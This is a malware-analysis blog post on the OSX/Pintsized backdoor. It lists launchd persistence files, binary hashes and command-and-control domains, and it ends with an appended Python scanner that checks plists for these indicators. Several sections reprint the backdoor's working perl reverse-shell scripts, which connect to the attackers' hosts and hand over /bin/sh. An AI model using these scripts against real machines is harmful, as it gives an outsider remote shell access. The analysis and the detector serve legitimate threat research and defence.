# OSX/Pintsized Backdoor Additional Details

**[eromang.zataz.com/2013/03/24/osx-pintsized-backdoor-additional-details/](https://eromang.zataz.com/2013/03/24/osx-pintsized-backdoor-additional-details/)**

24/03/2013

In complement to my previous blog post on these attacks, you will find below some additional information regarding OSX/Pintsized, the backdoor used in them.

The OSX/Pintsized backdoor was initially described by [Intego](https://www.intego.com/mac-security-blog/pint-sized-backdoor-for-os-x-discovered/) on 19 February, with some details. At the time of the Intego post, all of the C&C components were sinkholed to [Shadowserver](https://shadowserver.org/wiki/). The backdoor was composed of clear text reverse shell perl scripts, executed at a regular interval, and of a forked version of OpenSSH named “cupsd“. An RSA key was embedded in the forked OpenSSH, the reported C&C domain name was “corp-aapl.com” and the reported file names were:

- com.apple.cocoa.plist
- cupsd (Mach-O binary)
- com.apple.cupsd.plist
- com.apple.cups.plist
- com.apple.env.plist

[F-Secure](http://www.f-secure.com/weblog/archives/00002505.html) also reported, on 19 February, some additional C&C servers: “cloudbox-storage.com” and “digitalinsight-ltd.com“.

[Symantec](https://www.symantec.com/security_response/writeup.jsp?docid=2013-022017-1613-99&tabid=2) reported some additional details on the C&C domain names “cache.cloudbox-storage.com“, “img.digitalinsight-ltd.com” and “pop.digitalinsight-ltd.com“, and also reported the storage location of the forked version of OpenSSH: “/Users/[USER NAME]/.cups/cupsd“.

By doing an analysis of OSX/Pintsized I can provide the following additional information.

## launchd configuration files

All files targeting OSX were controlled by the [launchd](https://developer.apple.com/library/mac/#documentation/Darwin/Reference/ManPages/man8/launchd.8.html) daemon through launchd.plist configuration files. Below is the list of all known launchd configuration files.

### [7fe4149b82516ae43938de6b8316ed84](https://www.virustotal.com/en/file/3b829abe42252b2fa8d304b93a35090c23f3702ad048adfdd03942f77e0f5a66/analysis/)

**First seen: 2013-02-19 / Label: com.apple.cupsd / RunAtLoad: true / StartInterval: 900 / C&C: corp-aapl.com:8443**

Executes “/Users/[USER NAME]/.cups/cupsd -z corp-aapl.com -P 8443”

### [2e35b9a683ccc2408fef5ca575abf0e6](https://www.virustotal.com/en/file/62cac21ff3d2745a4b83770950b07b959d11fb4c4828eac14680c001824a1a68/analysis/)

**First seen: 2013-02-19 / Label: com.apple.cupsd / RunAtLoad: true / StartInterval: 900 / C&C: corp-aapl.com:8443**

Executes “/Users/[USER NAME]/.cups/cupsd -z corp-aapl.com -P 8443”

### [27f241 64303 4 2d1d94d3143 48 b9](https://www.virustotal.com/en/file/7ba90281a833f046069a64c3805bd29d92276177c6fb41e6a8966cf0b4f07b96/analysis/)

**First seen: 2013-02-19 / Label: com.apple.istore / RunAtLoad: true / StartInterval: 900 / C&C: cache.cloudbox-storage.com:443**

Executes the following script with /usr/bin/perl

```
use Socket;
$p=sockaddr_in(443,inet_aton("cache.cloudbox-storage.com"));
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
connect(S,$p);
open(STDIN,">&S");
open(STDOUT,">&S");
open(STDERR,">&S");
exec("/bin/sh -i");
```

### [2b9b84f0612d6f9d7efb705dd7522f83](https://www.virustotal.com/en/file/837de378c6b95156a53f5536c0d982d247335a22e6bf5f146a6c3f4c84bc55bd/analysis/)

**First seen: 2013-02-19 / Label: com.apple.env / RunAtLoad: true / StartInterval: 900 / C&C: cache.cloudbox-storage.com:443**

Executes the following script with /usr/bin/perl

```
use Socket;
$p=sockaddr_in(443,inet_aton("cache.cloudbox-storage.com"));
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
connect(S,$p);
open(STDIN,">&S");
open(STDOUT,">&S");
open(STDERR,">&S");
exec("/bin/sh -i");
```

### [34cee92669e0c60a9dbafae7319f49db](https://www.virustotal.com/en/file/490d6a45bd7e5ee265373f46fd00e98ff2eb854c0ceda024aa3adaefd947202f/analysis/)

**First seen: 2013-02-19 / Label: com.apple.env / RunAtLoad: true / StartInterval: 900 / C&C: img.digitalinsight-ltd.com:443**

Executes the following script with /usr/bin/perl

```
use Socket;
$p=sockaddr_in(443,inet_aton("img.digitalinsight-ltd.com"));
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
connect(S,$p);
open(STDIN,">&S");
open(STDOUT,">&S");
open(STDERR,">&S");
exec("/bin/sh -i");
```

### [d3f151b246deb74890c612606c6ad044](https://www.virustotal.com/en/file/e8b8e23c1991eefb06d1b1c7f96d5044d7ba8c93f76dad7329762ea00bc19898/analysis/)

**First seen: 2013-02-19 / Label: com.apple.env / RunAtLoad: true / StartInterval: 900 / C&C: pop.digitalinsight-ltd.com:443**

Executes the following script with /usr/bin/perl

```
use Socket;
$h="pop.digitalinsight-ltd.com ";
$h=~s/\s+$//;
$p=sockaddr_in(443,inet_aton($h));
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
connect(S,$p);
open(STDIN,">&S");
open(STDOUT,">&S");
open(STDERR,">&S");
exec("/bin/sh -i");
```

### [f419dfb35a0d220c4c53c4a087c91d5e](https://www.virustotal.com/en/file/2869d87a9d9abf7fbe3613e4a2520151358f3dcbad3f308e522fbf207fd3eb4f/analysis/)

**First seen: 2013-02-19 / Label: com.apple.env / RunAtLoad: true / StartInterval: 900 / C&C: pop.digitalinsight-ltd.com:443**

Executes the following script with /usr/bin/perl

```
use Socket;
$p=sockaddr_in(443,inet_aton("pop.digitalinsight-ltd.com"));
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
connect(S,$p);
open(STDIN,">&S");
open(STDOUT,">&S");
open(STDERR,">&S");
exec("/bin/sh -i");
```

### [59424d4a567ae809f96afc56d22892b2](https://www.virustotal.com/en/file/b4274c7496f27dade23e8515deb519417e34d684a15d4c29c36047825a8446e6/analysis/)

**First seen: 2013-02-19 / Label: com.apple.env / RunAtLoad: true / StartInterval: 999 / C&C: img.digitalinsight-ltd.com:443**

Executes the following script with /usr/bin/perl

```
use Socket;
$p=sockaddr_in(443,inet_aton("img.digitalinsight-ltd.com"));
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
connect(S,$p);
open(STDIN,">&S");
open(STDOUT,">&S");
open(STDERR,">&S");
exec("/bin/sh -i");
```

## Binary files

Below are all known binary files, i.e. “/Users/[USER NAME]/.cups/cupsd” or “/usr/sbin/muxd“.

### [0ec55685affc322a5d7be2e9ca1f9cbf](https://www.virustotal.com/en/file/8f5d8748a66e7b54aeaafc1b65b974db31fe8403c9d39b187fd54943c6d97d98/analysis/)

**First seen: 2013-01-31 / CPU Architecture: 64 bit**

Fork of OpenSSH_6.0 with no logging, and “-P” and “-z” hidden command arguments. Contains the “PuffySSH_5.8p1” string and a [2048 bit embedded private key with associated public key](https://pastebin.com/ZtgrAfg5).

### [3a861b8526e397b3684a99f363ec145b](https://www.virustotal.com/en/file/a610bb3396a2eb6186a135de5d0a5d29e16525fb7c069e853d0ce2bb90ca4921/analysis/)

**First seen: 2013-02-20 / CPU Architecture: 64 bit**

Fork of OpenSSH_6.0p1 with no logging, and “-P” and “-z” hidden command arguments. Contains the “PuffySSH_5.8p1” string and a [2048 bit embedded private key with associated public key](https://pastebin.com/ZtgrAfg5).

Below is an additional binary caught when Microsoft also disclosed that they were a victim of this campaign.

### [1582d68144de2808b518934f0a02bfd6](https://www.virustotal.com/en/file/8ca7ed720babb32a6f381769ea00e16082a563704f8b672cb21cf11843f4da7a/analysis/)

**First seen: 2013-01-22 / Internal name: javacpl.exe**

One additional file that was reported as linked to the campaign:

### [622fc8b7daf425aed7f9ffa97e30c611](https://www.virustotal.com/en/file/09ae47e516d368ac1541f102e08b364f2e53c8fdfb5523a0cc6c1442969b6218/analysis/)

**First seen: 2013-01-04 / Type: Java serialized data**

## Domain names

If you take a look at all the domain names sinkholed to [Shadowserver](https://shadowserver.org/wiki/), you will see additional domain names.

- **Domain name: corp-appl.com – Creation Date: 05-mar-2012**
- **Domain name: cloudbox-storage.com – Creation Date: 07-dec-2012 – Sub-domains: cache.cloudbox-storage.com**
- **Domain name: digitalinsight-ltd.com – Creation Date: 22-mar-2012 – Sub-domains: ads.digitalinsight-ltd.com, img.digitalinsight-ltd.com, www.digitalinsight-ltd.com and pop.digitalinsight-ltd.com**
- **Domain name: clust12-akmai.net – Creation Date: 06-jun-2012 – Sub-domains: fb.clust12-akmai.net and fbu.clust12-akmai.net**
- **Domain name: jdk-update.com – Creation Date: 31-oct-2012 – Sub-domains: ww1.jdk-update.com and www.jdk-update.com**
- **Domain name: fbcbn.net – Creation Date: 09-oct-2012 – Sub-domains: ak.fbcbn.net and static.ak.fbcbn.net**
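The launchd entries and binary paths listed above give a defender enough to triage a user's LaunchAgents directory. The following added example (my own code, not from the original post) parses a launchd plist and reports which of the page's indicators it matches: the com.apple.* labels, the ~/.cups/cupsd and /usr/sbin/muxd paths, the hidden -z/-P arguments, the C&C domain names, and the RunAtLoad + StartInterval persistence pattern; the sample plist is constructed to mirror the com.apple.cupsd entry and is not a real file.

```python
import plistlib
import re

# Indicators taken from the OSX/Pintsized write-up above.
KNOWN_LABELS = {"com.apple.cupsd", "com.apple.cups", "com.apple.istore",
                "com.apple.env", "com.apple.cocoa"}
KNOWN_CC = {"corp-aapl.com", "cache.cloudbox-storage.com",
            "img.digitalinsight-ltd.com", "pop.digitalinsight-ltd.com"}
BINARY_PATHS = re.compile(r"(/\.cups/cupsd|/usr/sbin/muxd)$")
# Telltale fragments of the embedded perl reverse shell scripts.
PERL_MARKERS = ("use Socket", "sockaddr_in(", 'exec("/bin/sh -i")')


def scan_launchd_plist(data: bytes) -> list:
    """Return the list of Pintsized indicators found in one launchd plist."""
    plist = plistlib.loads(data)
    hits = []
    label = plist.get("Label", "")
    args = plist.get("ProgramArguments") or []
    if label in KNOWN_LABELS:
        hits.append(f"known label {label}")
    # Every known sample beacons on a timer and starts at login.
    if plist.get("RunAtLoad") and "StartInterval" in plist:
        hits.append(f"persistence: RunAtLoad + StartInterval={plist['StartInterval']}")
    for i, arg in enumerate(args):
        if BINARY_PATHS.search(arg):
            hits.append(f"known binary path {arg}")
        if arg in ("-z", "-P") and i + 1 < len(args):
            hits.append(f"hidden cupsd argument {arg} {args[i + 1]}")
        if all(marker in arg for marker in PERL_MARKERS):
            hits.append("inline perl reverse shell")
        for domain in KNOWN_CC:
            if domain in arg:
                hits.append(f"known C&C {domain}")
    return hits


# Constructed sample modelled on the com.apple.cupsd entry above (not a real file).
SAMPLE_CUPSD = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
<key>Label</key><string>com.apple.cupsd</string>
<key>ProgramArguments</key><array>
<string>/Users/alice/.cups/cupsd</string><string>-z</string>
<string>corp-aapl.com</string><string>-P</string><string>8443</string>
</array>
<key>RunAtLoad</key><true/>
<key>StartInterval</key><integer>900</integer>
</dict></plist>"""

if __name__ == "__main__":
    for hit in scan_launchd_plist(SAMPLE_CUPSD):
        print(hit)
```

Run it over every file in ~/Library/LaunchAgents and /Library/LaunchDaemons; any non-empty result deserves a look at the referenced binary.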